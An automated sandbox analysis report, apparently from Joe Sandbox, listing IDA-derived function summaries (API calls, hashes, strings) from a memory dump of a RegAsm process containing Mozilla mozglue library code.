                                                                                      Similarity
                                                                                      • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                      • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                      • API String ID: 2690322072-3894294050
                                                                                      • Opcode ID: 740424d7c062297d53978ae8f7ea3825a5ce7940c72ea8a7432e57c5bf97537a
                                                                                      • Instruction ID: 1867428265d482eb23422f60530c4341f59a073a9743d78f8c4b06f3ee5789e8
                                                                                      • Opcode Fuzzy Hash: 740424d7c062297d53978ae8f7ea3825a5ce7940c72ea8a7432e57c5bf97537a
                                                                                      • Instruction Fuzzy Hash: 8291AF71B047018FD714DF29C59072AB7E1EF99318F158A2EE59A87F81EB34E845CB82
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(000007D0), ref: 6C144EFF
                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C144F2E
                                                                                      • moz_xmalloc.MOZGLUE ref: 6C144F52
                                                                                      • memset.VCRUNTIME140(00000000,00000000), ref: 6C144F62
                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C1452B2
                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C1452E6
                                                                                      • Sleep.KERNEL32(00000010), ref: 6C145481
                                                                                      • free.MOZGLUE(?), ref: 6C145498
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                      • String ID: (
                                                                                      • API String ID: 4104871533-3887548279
                                                                                      • Opcode ID: f5e5c05af9cc78e83dd7c39bfe71d18e379fb3def85ee8eb4a2e2f8c4b89f8dd
                                                                                      • Instruction ID: b7146093a1ae857e430ca1b02c8e4abf2185e6b878c6daa3ee9ba929753660e9
                                                                                      • Opcode Fuzzy Hash: f5e5c05af9cc78e83dd7c39bfe71d18e379fb3def85ee8eb4a2e2f8c4b89f8dd
                                                                                      • Instruction Fuzzy Hash: 86F1C071A18B008FC716DF39C85062BB7F6AFE6384F05872EF856A7651DB31D8428B81
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(6C16E744), ref: 6C0F7885
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E744), ref: 6C0F78A5
                                                                                      • EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0F78AD
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0F78CD
                                                                                      • EnterCriticalSection.KERNEL32(6C16E7DC), ref: 6C0F78D4
                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0F78E9
                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C0F795D
                                                                                      • memset.VCRUNTIME140(?,00000000,00000160), ref: 6C0F79BB
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C0F7BBC
                                                                                      • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0F7C82
                                                                                      • LeaveCriticalSection.KERNEL32(6C16E7DC), ref: 6C0F7CD2
                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C0F7DAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeavememset
                                                                                      • String ID:
                                                                                      • API String ID: 759993129-0
                                                                                      • Opcode ID: 898fb76428ee43c3d8be26a56c44fcfb4743224f27e50f698cf8c02e11a92c07
                                                                                      • Instruction ID: a8f32119eb1501db989865201b7ac670e41d282332ed9c4880ce70b0e84ae01e
                                                                                      • Opcode Fuzzy Hash: 898fb76428ee43c3d8be26a56c44fcfb4743224f27e50f698cf8c02e11a92c07
                                                                                      • Instruction Fuzzy Hash: D2026C71A0121A8FDB54CF19C9947A9B7F5FF88318F6582AADC19A7701D730AE91CF80
                                                                                      APIs
                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C1251DF
                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C12529C
                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C1252FF
                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C12536D
                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C1253F7
                                                                                        • Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
                                                                                        • Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1
                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C1256C3
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C1256E0
                                                                                      Strings
                                                                                      • MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C1256BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                                                      • String ID: MOZ_PROFILER_RECORD_OVERHEADS
                                                                                      • API String ID: 1227157289-345010206
                                                                                      • Opcode ID: 7c6e763c5067b8be50ed6f32be0f0b1c1415046819a51dfe20054e9f55d6c7f3
                                                                                      • Instruction ID: 5b42aad85117812430ae5af1d061b8673e719778c0ff82549faccbe0b788736f
                                                                                      • Opcode Fuzzy Hash: 7c6e763c5067b8be50ed6f32be0f0b1c1415046819a51dfe20054e9f55d6c7f3
                                                                                      • Instruction Fuzzy Hash: 65E1AF75918F45CAC312DF358850267B7B9BFAB394F10DB0EE8AA2A950DF34E0869701
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32 ref: 6C147046
                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C147060
                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C14707E
                                                                                        • Part of subcall function 6C0F81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0F81DE
                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C147096
                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C14709C
                                                                                      • LocalFree.KERNEL32(?), ref: 6C1470AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                      • String ID: ### ERROR: %s: %s$(null)
                                                                                      • API String ID: 2989430195-1695379354
                                                                                      • Opcode ID: 83664518a3cb1089ad3717fc1daebea72d9eb054754aba1b0f6dd81a60615b5f
                                                                                      • Instruction ID: 3786b84f7895b8b6d633df20b273007d4ca3c00f23fb6dc78936c60c9674820d
                                                                                      • Opcode Fuzzy Hash: 83664518a3cb1089ad3717fc1daebea72d9eb054754aba1b0f6dd81a60615b5f
                                                                                      • Instruction Fuzzy Hash: FE01B9B2A00104AFDB00AB66DC4ADBF7BBCEF49254F010435FA45E7641E671A914DBA1
                                                                                      APIs
                                                                                      • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C132C31
                                                                                      • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C132C61
                                                                                        • Part of subcall function 6C0E4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0E4E5A
                                                                                        • Part of subcall function 6C0E4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0E4E97
                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C132C82
                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C132E2D
                                                                                        • Part of subcall function 6C0F81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0F81DE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                      • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                      • API String ID: 801438305-4149320968
                                                                                      • Opcode ID: 24b865cdcb3da31e8a6ec41feb1848e92aac3dd95797b99c635dc1a983564202
                                                                                      • Instruction ID: c4c202e544fc40e8f0a99d702e5dc4db098ab1e69128a7b21704330664ec2429
                                                                                      • Opcode Fuzzy Hash: 24b865cdcb3da31e8a6ec41feb1848e92aac3dd95797b99c635dc1a983564202
                                                                                      • Instruction Fuzzy Hash: B291D0B06083808FC724DF28C48469EF7E0AFC935CF50592DE99A9B751DB34D54ACB92
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldiv__aullrem
                                                                                      • String ID: -Infinity$NaN
                                                                                      • API String ID: 3839614884-2141177498
                                                                                      • Opcode ID: d712cd8e07d1b78508a8097884526138761f9a7755649799ba586cde7f65f196
                                                                                      • Instruction ID: 642a7d4351bb235132c5e961003889e5410526bcf7cac9742cff46e1d9948533
                                                                                      • Opcode Fuzzy Hash: d712cd8e07d1b78508a8097884526138761f9a7755649799ba586cde7f65f196
                                                                                      • Instruction Fuzzy Hash: DDC1CF71E04319CBDB14CFA8C8A0B9EB7BAFF89714F158529D405ABB80D774AD49CB90
                                                                                      APIs
                                                                                        • Part of subcall function 6C0F9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C14B92D), ref: 6C0F9BC8
                                                                                        • Part of subcall function 6C0F9B80: __Init_thread_footer.LIBCMT ref: 6C0F9BDB
                                                                                      • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0F03D4,?), ref: 6C14B955
                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C14B9A5
                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C14BA20
                                                                                      • RtlNtStatusToDosError.NTDLL ref: 6C14BA7B
                                                                                      • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C14BA81
                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C14BA86
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                                      • String ID:
                                                                                      • API String ID: 1753913139-0
                                                                                      • Opcode ID: ed33ee96478dbc02edef8cca7b1300822fde88d5b5fc234e99d68e65671ea360
                                                                                      • Instruction ID: b039a182d325543268beb46339abc911edf81cc66b368ee545b0899604fb6feb
                                                                                      • Opcode Fuzzy Hash: ed33ee96478dbc02edef8cca7b1300822fde88d5b5fc234e99d68e65671ea360
                                                                                      • Instruction Fuzzy Hash: E6516B71E01619DFDF14CEA8D990ADEB7B6EF88318F258129E901B7B44DB30AD458B90
                                                                                      APIs
                                                                                        • Part of subcall function 6C11FA80: GetCurrentThreadId.KERNEL32 ref: 6C11FA8D
                                                                                        • Part of subcall function 6C11FA80: AcquireSRWLockExclusive.KERNEL32(6C16F448), ref: 6C11FA99
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128BD5
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128C3A
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128C74
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128CBA
                                                                                      • free.MOZGLUE(?), ref: 6C128CCF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
                                                                                      • String ID:
                                                                                      • API String ID: 2153970598-0
                                                                                      • Opcode ID: d510cd06f3439ae9764385af5140338b17dc47db587a6e6c9a3fefc2555564ff
                                                                                      • Instruction ID: ce05311d8bc25380f85b47e4a0f60a8a8d4230651fb63722b4a19d52af12d4e7
                                                                                      • Opcode Fuzzy Hash: d510cd06f3439ae9764385af5140338b17dc47db587a6e6c9a3fefc2555564ff
                                                                                      • Instruction Fuzzy Hash: CC71A075A14B008FD704CF29C48066AB7F1FF99318F058A5EE9899B722E774F884CB41
                                                                                      APIs
                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C0EF2B4
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 6C0EF2F0
                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C0EF308
                                                                                      • RtlNtStatusToDosError.NTDLL ref: 6C0EF36B
                                                                                      • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6C0EF371
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
                                                                                      • String ID:
                                                                                      • API String ID: 1171715205-0
                                                                                      • Opcode ID: af680e6f2c9d1daa581b875098d24156b1109e520eae7f04c1bf5292ac26b91d
                                                                                      • Instruction ID: 7c33014e84f4720059fcdf5e444195f103587b81929f4d86882cfa0ce1dd1e77
                                                                                      • Opcode Fuzzy Hash: af680e6f2c9d1daa581b875098d24156b1109e520eae7f04c1bf5292ac26b91d
                                                                                      • Instruction Fuzzy Hash: 1A21A5B0A44348EFEB109A75ED54BEF76FCAB4D35CF24422AE420966C0D7B49948C761
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6C158A4B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID:
                                                                                      • API String ID: 2221118986-0
                                                                                      • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                      • Instruction ID: 5977ac617dd7cb59b8f85a53f5fb77dc4f9fdc88b89412741504ced913574afd
                                                                                      • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                      • Instruction Fuzzy Hash: E8B107B2E0021ACFDB14CF68CC907A8B7B2EF95314F5902A9C559DB791D730A996CF90
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6C1588F0
                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C15925C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID:
                                                                                      • API String ID: 2221118986-0
                                                                                      • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                      • Instruction ID: 97aa2bbb0665c540cab951c0cc3df68417ab3c4f221eec0b4934f80116f2442e
                                                                                      • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                      • Instruction Fuzzy Hash: A8B1E5B2E0020ACFDB14CF58C8917ADB7B2EF84314F550269C959DB785D734A99ACB90
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C158E18
                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C15925C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID:
                                                                                      • API String ID: 2221118986-0
                                                                                      • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                      • Instruction ID: 9b5271f104442810ddf0229c9d70bc192469bf21a5a9cc4ec267f86f13df3a17
                                                                                      • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                      • Instruction Fuzzy Hash: 17A117B2E001168FDB14CF68CC90799B7B2EF85314F5502B9C959EB785D730AD9ACB90
                                                                                      APIs
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C137A81
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C137A93
                                                                                        • Part of subcall function 6C105C50: GetTickCount64.KERNEL32 ref: 6C105D40
                                                                                        • Part of subcall function 6C105C50: EnterCriticalSection.KERNEL32(6C16F688), ref: 6C105D67
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C137AA1
                                                                                        • Part of subcall function 6C105C50: __aulldiv.LIBCMT ref: 6C105DB4
                                                                                        • Part of subcall function 6C105C50: LeaveCriticalSection.KERNEL32(6C16F688), ref: 6C105DED
                                                                                      • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C137B31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                      • String ID:
                                                                                      • API String ID: 4054851604-0
                                                                                      • Opcode ID: e74f77a8597402269551d875277da6208745a317fc1ecc2210460557bc331986
                                                                                      • Instruction ID: 6ba41c6635745d7d81f0f45b8ead26c2c4d98cb695a4bf975042115973a5d97d
                                                                                      • Opcode Fuzzy Hash: e74f77a8597402269551d875277da6208745a317fc1ecc2210460557bc331986
                                                                                      • Instruction Fuzzy Hash: 80B18C356083A0CBCB14CE24C55075FB7E2AFC931CF155A1DE999A7B90DB70E90ACB82
                                                                                      APIs
                                                                                      • NtQueryVirtualMemory.NTDLL ref: 6C14B720
                                                                                      • RtlNtStatusToDosError.NTDLL ref: 6C14B75A
                                                                                      • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C11FE3F,00000000,00000000,?,?,00000000,?,6C11FE3F), ref: 6C14B760
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                                      • String ID:
